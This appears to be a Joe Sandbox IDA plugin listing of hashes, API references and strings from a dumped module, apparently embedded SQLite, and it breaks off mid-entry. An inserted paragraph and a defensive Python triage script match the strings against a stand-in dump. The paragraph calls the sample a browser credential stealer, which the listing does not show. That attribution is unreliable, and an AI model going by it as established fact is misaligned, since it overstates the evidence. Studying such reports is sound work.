• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: strcmp
• String ID: BINARY$p$q$rows inserted
• API String ID: 1004003707-1829360308
• Opcode ID: 554fd9107683538e553bbdd7453343ff52aa5f40e52515fbc76710f7706305a6
• Instruction ID: 065edfd01cf961ed3b9e2e1e11ae97a3b52417d8b8be7254ab2c95bfb3f70183
• Opcode Fuzzy Hash: 554fd9107683538e553bbdd7453343ff52aa5f40e52515fbc76710f7706305a6
• Instruction Fuzzy Hash: 8113D574A0425A8FEB21CF68C980B99B7F1AB89304F20C5E9D889A7351D774EEC5CF51
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: 2$BINARY$E$NOCASE$false$u
• API String ID: 0-3666730823
• Opcode ID: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
• Instruction ID: 6b9246b4563a5e155af7b98e7ab84f845b82c0e831d1f7dba739a0367b6c7f33
• Opcode Fuzzy Hash: 44b2ffa57a66e06a5b41c824db9348c812c03fba735669014661c96b475b74fa
• Instruction Fuzzy Hash: 39F24774A442598FDB10CFA8C480B8DBBF5BF49318F65C169E858AB355D734EC86CB90
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: $$$-$-$Inf$NaN
• API String ID: 0-2883260867
• Opcode ID: 028b7e2239e5b65ec7313dae655860b22c75c4cb4265c042bc54a10a851200c5
• Instruction ID: 08ada5b9c357915bf8dc0511ebd4b169d1569d08758c0a6763b5a4183e8dfcc3
• Opcode Fuzzy Hash: 028b7e2239e5b65ec7313dae655860b22c75c4cb4265c042bc54a10a851200c5
• Instruction Fuzzy Hash: 8D92B370E4D2958EDB219B68C881398BBF1AB86344F34C4D9C49D9736AE735CAC9CF41
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: A$]a$bua$ha$ma$snippet
• API String ID: 0-4021802672
• Opcode ID: e754448faf19ea707398a918d49288099522785639e5b2117c15e0095244ef52
• Instruction ID: b2623b0ed89b922f0be96898bd960c36401f43a5980a856a5f0c11e76d1438fa
• Opcode Fuzzy Hash: e754448faf19ea707398a918d49288099522785639e5b2117c15e0095244ef52
• Instruction Fuzzy Hash: C392CF7490426ACFDB64CF69C884BC9B7B1BB48314F2486EAD85DAB250D7709EC5CF90
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: missing from index $d$non-unique entry in index $q$row $wrong # of entries in index
• API String ID: 0-2434882124
• Opcode ID: 7b4e3502c80a4384d77415debf17acac60d31245c151a2030a67de06a2fb1782
• Instruction ID: 64764bd2453105caa9badb98113fecf854144ac2eeaebcc13dcf1322e2d74596
• Opcode Fuzzy Hash: 7b4e3502c80a4384d77415debf17acac60d31245c151a2030a67de06a2fb1782
• Instruction Fuzzy Hash: 5272E374A042898FDB50DFA8C59079DBBF1BB88304F20C56DE8A8AB395D775E942CF41
APIs
• SetUnhandledExceptionFilter.KERNEL32 ref: 61EAF94F
• UnhandledExceptionFilter.KERNEL32 ref: 61EAF95F
• GetCurrentProcess.KERNEL32 ref: 61EAF968
• TerminateProcess.KERNEL32 ref: 61EAF979
• abort.MSVCRT ref: 61EAF982
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
• String ID:
• API String ID: 520269711-0
• Opcode ID: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
• Instruction ID: c24ac7f06ebf37709200600ee493e26a75483ae19b01d267103323a56ae8c6ad
• Opcode Fuzzy Hash: a4a9847f77e74dada988f497729c1a98e5ce87648e4cbf1531909a786ce77a21
• Instruction Fuzzy Hash: A911C0B5A14A04CFDB00EFB9D64861EBBF0EB5A304F548929E998CB311E774D9848F52
APIs
• SetUnhandledExceptionFilter.KERNEL32 ref: 61EAF94F
• UnhandledExceptionFilter.KERNEL32 ref: 61EAF95F
• GetCurrentProcess.KERNEL32 ref: 61EAF968
• TerminateProcess.KERNEL32 ref: 61EAF979
• abort.MSVCRT ref: 61EAF982
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
• String ID:
• API String ID: 520269711-0
• Opcode ID: 809d5849f306e8cbba18693fd90c7cf66234664076c9294cd7ae7ac548d3f73e
• Instruction ID: 7495df9e9e8546bc4f00ea4b28ebddf21febabb08c5f400c51aaf875caca2d4b
• Opcode Fuzzy Hash: 809d5849f306e8cbba18693fd90c7cf66234664076c9294cd7ae7ac548d3f73e
• Instruction Fuzzy Hash: DB11F3B1914A04CFDB00EFB9D64821D7BF0EB0A304F148529E958CB301E774D984CF52
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: $ASC$DESC$bua$bua
• API String ID: 0-1029442847
• Opcode ID: 2b39d7686fbeeddcbd5bbfe8158d907f1e0604d559b7dfd738d035b72e77a465
• Instruction ID: 8ab5de4e3564c360289137fee1b889a4ea914830ed3e88a553d2216b992680de
• Opcode Fuzzy Hash: 2b39d7686fbeeddcbd5bbfe8158d907f1e0604d559b7dfd738d035b72e77a465
• Instruction Fuzzy Hash: 0852E2B4A053498FDB10CFA9C580A8EBBF1BF89304F25856DE899AB351D734E846CF51
APIs
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: memmove
• String ID:
• API String ID: 2162964266-0
• Opcode ID: 7f10491847b7dab5f18c91b2f383d78093535c39cc382b4577faff4c42e413f3
• Instruction ID: bc40f1fef1a9170960cc57993c705059dbee377a108b532450c26420989eb83f
• Opcode Fuzzy Hash: 7f10491847b7dab5f18c91b2f383d78093535c39cc382b4577faff4c42e413f3
• Instruction Fuzzy Hash: ACE2F174A046698FCB65CF69D880BD9B7F1BF89314F2481E9D948A7314D738AE85CF80
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID:
• String ID: ROWID$rows updated
• API String ID: 0-3149524134
• Opcode ID: 7fc51814d4df85eb7f7c1a496900f899ee2e71b5c20762128eabbebdfffcb40d
• Instruction ID: d39c60c32cc69d7ad3465f9f6cb7242007ae0eab8187012a9ec74863cc1168bc
• Opcode Fuzzy Hash: 7fc51814d4df85eb7f7c1a496900f899ee2e71b5c20762128eabbebdfffcb40d
• Instruction Fuzzy Hash: 5913E474A04259CFEB20CFA8C484B9DBBF1BF89308F208559D899AB355D774E986CF41
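The String ID values recorded for this module (missing from index, non-unique entry in index, wrong # of entries in index, ASC and DESC, ROWID, rows updated) are recognisable as literals from SQLite's own source: the PRAGMA integrity_check messages in vdbe.c and the count_changes column name in update.c. The report does not state this itself; it is an inference from the strings, and it points to the image dumped at 0x61E00000 in process 4 being an embedded SQLite library, which a credential stealer needs in order to read Chromium and Firefox login and history databases. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin. It parses the report's String ID lines (assuming '$' is the separator Joe Sandbox places between strings), scans a constructed stand-in for the .sdmp bytes, and flags the module when two or more SQLite markers are present. The module base 0x61E00000 is taken from the Offset field of the listing; the dump bytes and the marker threshold are assumptions made for the example.

```python
"""Triage helper: map Joe Sandbox 'String ID' entries onto a memory dump.

Added example, not part of the Joe Sandbox report. It parses the per-function
"String ID" lines as they appear in the listing, searches a dump for those
strings, and reports whether the module looks like an embedded SQLite
library. The '$' separator, the 0x61E00000 module base and the sample dump
bytes are assumptions made for the example.
"""
import re
from typing import Dict, List

# Joe Sandbox joins a function's string references with '$' (assumption).
STRING_ID_RE = re.compile(r"String ID:\s*(.*)$")

# Literals from SQLite's own source tree: the PRAGMA integrity_check messages
# in vdbe.c and the count_changes column name "rows updated" in update.c.
# Two or more of these in one module is treated as a strong SQLite indicator.
SQLITE_MARKERS = frozenset({
    "missing from index",
    "non-unique entry in index",
    "wrong # of entries in index",
    "ROWID",
    "rows updated",
})

# Module base taken from the "Offset: 61E00000" field of the listing.
MODULE_BASE = 0x61E00000

# The report's own String ID lines for this module, copied verbatim.
REPORT_LINES = [
    "• String ID: missing from index $d$non-unique entry in index $q$row $wrong # of entries in index",
    "• String ID: $ASC$DESC$bua$bua",
    "• String ID: ROWID$rows updated",
]

# Constructed stand-in for a .sdmp region: a few NUL-terminated SQLite
# literals between filler bytes. Not real dump content.
DUMP = (
    b"\x00" * 16
    + b"wrong # of entries in index \x00"
    + b"\x90" * 8
    + b"non-unique entry in index %s\x00"
    + b"ROWID\x00rows updated\x00"
    + b"\xcc" * 16
)


def parse_string_ids(report_lines, min_len: int = 4) -> List[str]:
    """Split every 'String ID' line on '$' and return the distinct strings.

    Fragments shorter than min_len (the 'd' / 'q' remnants in the listing)
    are dropped because they would match almost anywhere in a dump.
    """
    seen = set()
    out: List[str] = []
    for line in report_lines:
        m = STRING_ID_RE.search(line)
        if not m:
            continue
        for tok in m.group(1).split("$"):
            tok = tok.strip()
            if len(tok) >= min_len and tok not in seen:
                seen.add(tok)
                out.append(tok)
    return out


def scan_dump(dump: bytes, needles, base: int) -> Dict[str, List[int]]:
    """Return {string: [absolute addresses]} for every needle found in dump.

    Matching is on raw ASCII bytes, which is how SQLite stores these
    literals; a UTF-16LE pass would be needed for Windows wide strings.
    """
    hits: Dict[str, List[int]] = {}
    for s in needles:
        pat = s.encode("ascii")
        pos, found = 0, []
        while (pos := dump.find(pat, pos)) != -1:
            found.append(base + pos)
            pos += 1
        if found:
            hits[s] = found
    return hits


def triage(report_lines, dump: bytes, base: int = MODULE_BASE) -> dict:
    """Parse the listing, scan the dump, and decide whether it looks like SQLite."""
    needles = parse_string_ids(report_lines)
    hits = scan_dump(dump, needles, base)
    markers = sorted(s for s in hits if s in SQLITE_MARKERS)
    return {
        "strings": needles,
        "hits": hits,
        "sqlite_markers_found": len(markers),
        "looks_like_sqlite": len(markers) >= 2,
    }


if __name__ == "__main__":
    result = triage(REPORT_LINES, DUMP)
    for s, addrs in result["hits"].items():
        print(f"{s!r:32} at " + ", ".join(f"0x{a:08X}" for a in addrs))
    print("embedded SQLite:", result["looks_like_sqlite"])
```

Against a real region, replace DUMP with the bytes of the downloaded .sdmp file and pass that region's start address as base, so the reported addresses line up with the ref values in the APIs lists above. A match on two or more markers is enough to identify SQLite; the remaining ASCII strings then tell you which browser database schemas the stealer queries.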
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1475443563-3916222277
                                                                                                                                                                                      • Opcode ID: 28fe79d1155e5de0f8bd22624d64069e8dc9799e6828c49362d377715f58434c
                                                                                                                                                                                      • Instruction ID: bfece18307556e4ef4cbbc35f99f21af59f03d97bd6a6be96c4aa07d47f44be4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 28fe79d1155e5de0f8bd22624d64069e8dc9799e6828c49362d377715f58434c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F82D375E04259CFDB04CFA8C580A8DBBF1BF88308F258569E859AB355D778E946CF80
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                      • Opcode ID: e0b7aa421e04795397bc54ac951092465462035ac03a2c4a8fd6ecbd173340c4
                                                                                                                                                                                      • Instruction ID: a6081b29965de0926bd1f9b116bef4fbec5f60393564f64626f3e1bb6397bda8
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0b7aa421e04795397bc54ac951092465462035ac03a2c4a8fd6ecbd173340c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5823C374A04259CFDB60DFA8C884B8DBBF1BF88308F2585A9D888AB345D775D985CF41
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0$BINARY
                                                                                                                                                                                      • API String ID: 0-1556553403
                                                                                                                                                                                      • Opcode ID: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
                                                                                                                                                                                      • Instruction ID: e60323d610b5e953cfa2bbac53d573cb4ccd773d83c01c1116e4164fd3caed25
                                                                                                                                                                                      • Opcode Fuzzy Hash: dbf5463f1b26696ad097613312d0e8a281b4cdde38a6e2070d2bb0de8395586b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E22E1B4E0425A8FDB04CFA8D480A9DBBF1FF98314F658569E859AB355D734E842CF80
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 9ua$BINARY
                                                                                                                                                                                      • API String ID: 0-3775120692
                                                                                                                                                                                      • Opcode ID: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
                                                                                                                                                                                      • Instruction ID: a257fdc816b75983c87695270593668a71f4eb775f4fb4bb7c1b83965cb32a4b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d1058f1121b4ac832307e0b4c14ecdaa80b0c74fbff9087e03826d3a53d8ce7
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED811978A0461A9FDB41CFA9D58079EBBF1BF88758F21C02AEC58AB354D774D841CB90
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 4
                                                                                                                                                                                      • API String ID: 0-4088798008
                                                                                                                                                                                      • Opcode ID: 69e42c9349b47ab598709cf7bf194c5a9beee1fbfb6073163f528dbfc61e7f72
